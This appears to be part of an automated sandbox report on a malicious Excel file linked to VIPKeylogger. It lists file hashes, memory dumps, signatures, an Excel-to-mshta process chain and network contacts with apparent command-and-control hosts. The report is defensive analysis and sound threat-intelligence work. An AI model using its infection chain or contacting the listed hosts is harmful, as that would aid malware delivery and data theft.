SHA512 b734d0d832b3408ef61021d5d88799a66884756b64b72122854bbb11a31082e1e9ad6320905aaf4bbfd3d83fd6bfd86f75a99aa0126fea4d8ebc64b1453ab20b

\??\c:\Users\Admin\AppData\Local\Temp\avpvcuom.0.cs

MD5 1c63aca6fcd4b799dee16b55bce4c6e2
SHA1 8fcd80ccd2301534e23bcfd20fd94ddc46df522a
SHA256 4eb92cf06004499456c3305b5cb070bbe43de8844b267b72878ace8c339613fb
SHA512 beded648bb2a995fa8a98da6d6682f43bd33e381953def85acf6ef69e77a9f2c8faab6f421c4eff6fdd3988df8c5b46bded68b9097052ce84cff02cfa70c9c0c

\??\c:\Users\Admin\AppData\Local\Temp\CSC1A64.tmp

MD5 08fe1110373d918bcde578ebdd65dc32
SHA1 0d00b9471a17a9632d84bbc326b26d9aee995d3e
SHA256 11e71860876dc07c6f91d8d5e341a9213f85a78467a4347bdbfd72f63b8c7f46
SHA512 2a14a75eb80db6fe60c369ffef39f7744a6938449a3e3d81f4650f321e769b39c64d9ecb119a63aedf36f8473477896446d404ab4ee7e0ce03026a43ee863781

C:\Users\Admin\AppData\Local\Temp\RES1A65.tmp

MD5 bfdbaf2504c657096cbf4aa07158d24d
SHA1 614c6451a62fa41b5f5e49bb0be00814468ea9e3
SHA256 ea708fa16c8f778cfa5ce181e3c34b5692a67d91b832763410156a21fd86f785
SHA512 d833bd086e328d47fcec0c5cc264dbf151edc854c3e199801a2016aeb749a807dff401f9a04a9685002eaee2f3a9bf43224fa8cce8d8e29ad6c0935c8c4b20e4

C:\Users\Admin\AppData\Local\Temp\avpvcuom.dll

MD5 afe7b327497749f3d9b45e60893db9fd
SHA1 6095037d2d5008eae8da481e3f4411401a35808b
SHA256 c3b9839b2a24ccfd0e7f346f8a5175f6911019ff705fe5559437386de7302ae2
SHA512 f9df0b039fc0be33a7f8ec55fc47a5bc16741baf0d2c433605fabfb9f5215ed5b1d4ee3298190c97e3803b30f5d969332770865293256ca0450cac47f06fe0c5

C:\Users\Admin\AppData\Local\Temp\avpvcuom.pdb

MD5 c9f5898ca85af495e52fb9d846b543d2
SHA1 4045cb65477654a45095aedc47d44dd175812c8a
SHA256 72a06cad84f56902747380783c3d13ac55040256e3c4c65af729ded147972c18
SHA512 74f29529b49659822e35cbd65288dcfe94e4aa08d49e6e6585d7e8b26524b8c404a2bb518d94616ceb51394612b87de580cecdcdd4d7f9ba10a4c3ae687d4a03

memory/2412-53-0x00000000724CD000-0x00000000724D8000-memory.dmp

C:\Users\Admin\AppData\Roaming\ctfmon.exe

MD5 2754c20856dbcc1c2d9e8588e9ed16d5
SHA1 34e0af1d464a5ba9decc0c7d6fa8fc4791c528d5
SHA256 c8817e34d3e3721ad4a24061d9df7839a69c40661e9cf58b33b036fd3a282acd
SHA512 1d0398f4f6910396379930253436ec86d152c08a0cc88fc5cbea986211be9fe00bfabdb9b3bc39b6f323b477b60e84d1279d7bd319243ed6bdc588e2e2cba486

memory/1676-60-0x0000000006A80000-0x0000000006C1B000-memory.dmp

memory/2360-76-0x0000000000400000-0x0000000000441000-memory.dmp

memory/2360-77-0x0000000000400000-0x0000000000441000-memory.dmp

memory/332-79-0x0000000001290000-0x000000000142B000-memory.dmp

memory/2360-80-0x00000000007F0000-0x0000000000850000-memory.dmp

memory/2360-81-0x0000000000CD0000-0x0000000000D2C000-memory.dmp

memory/2360-{82,83,85,87,...,139}-0x0000000000CD0000-0x0000000000D28000-memory.dmp (30 dumps of the same region in the hollowed RegSvcs.exe: sequence numbers 82, 83 and every odd number from 85 to 139)

memory/2412-1176-0x00000000724CD000-0x00000000724D8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2024-08-21 09:49
Reported: 2024-08-21 09:52
Platform: win10v2004-20240802-en
Max time kernel: 144s
Max time network: 136s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\1d7c97138b80caa4a9721ce7575926397613df390e74a0642399918575044a72.xls"

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\mshta.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4380 wrote to memory of 2196 (x2) | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Note: the three COM/WMI hits above carry no process, indicator or target, and in this run only EXCEL.EXE and mshta.exe executed. They are generic interface-usage signatures; the "persistence" and "ransomware" tags should not be read as evidence of either, since no scheduled task, shadow-copy deletion or persistence artifact appears anywhere in this report.

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\1d7c97138b80caa4a9721ce7575926397613df390e74a0642399918575044a72.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Note: on this Windows 10 run the chain stops at mshta.exe. The ir.cx and 45.66.231.209 contacts still happen (see Network), but no cmd.exe or powershell.exe is spawned, nothing is dropped, and none of the stealer or hollowing signatures fire. Only the Windows 7 run (behavioral1) shows the full VIPKeylogger behaviour, so the Win10 result on its own would under-score this sample.

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | roaming.officeapps.live.com | udp
IE | 52.109.76.243:443 | roaming.officeapps.live.com | tcp
US | 8.8.8.8:53 | ir.cx | udp
US | 172.67.197.42:443 | ir.cx | tcp
US | 8.8.8.8:53 | c.pki.goog | udp
FR | 216.58.214.163:80 | c.pki.goog | tcp
NL | 45.66.231.209:80 | 45.66.231.209 | tcp
US | 8.8.8.8:53 | tse1.mm.bing.net | udp
US | 150.171.27.10:443 (x5) | tse1.mm.bing.net | tcp
US | 8.8.8.8:53 | PTR lookups (17, in order of appearance, each with the .in-addr.arpa suffix): 217.106.137.52, 240.76.109.52, 25.140.123.92, 243.76.109.52, 42.197.67.172, 163.214.58.216, 23.159.190.20, 209.231.66.45, 28.118.140.52, 14.179.89.13, 26.35.223.20, 104.219.191.52, 26.165.165.52, 15.164.165.52, 172.214.232.199, 30.243.111.52, 10.27.171.150 | udp

Of the PTR lookups, 243.76.109.52, 42.197.67.172, 163.214.58.216, 209.231.66.45 and 10.27.171.150 are the reverse names of the roaming.officeapps.live.com, ir.cx, c.pki.goog, 45.66.231.209 and tse1.mm.bing.net addresses contacted in this run; the other twelve match no TCP contact in the table. The Windows 7 run issues no PTR queries at all, so this is Windows 10 background resolution rather than sample behaviour. Only ir.cx and 45.66.231.209 in this table are attributable to the sample.

Files

memory/4380-{0,1,2,4,6,73,74,75,76}-0x00007FFC14870000-0x00007FFC14880000-memory.dmp (EXCEL.EXE, 9 dumps of the same region)

memory/4380-3-0x00007FFC5488D000-0x00007FFC5488E000-memory.dmp

memory/4380-{5,7,8,9,10,11,42,77}-0x00007FFC547F0000-0x00007FFC549E5000-memory.dmp (8 dumps of the same region)

memory/4380-{12,13}-0x00007FFC12810000-0x00007FFC12820000-memory.dmp (2 dumps)

memory/2196-{34,35,37,43}-0x00007FFC547F0000-0x00007FFC549E5000-memory.dmp (mshta.exe, 4 dumps of the same region)

memory/2196-44-0x00007FF68EE70000-0x00007FF68EE78000-memory.dmp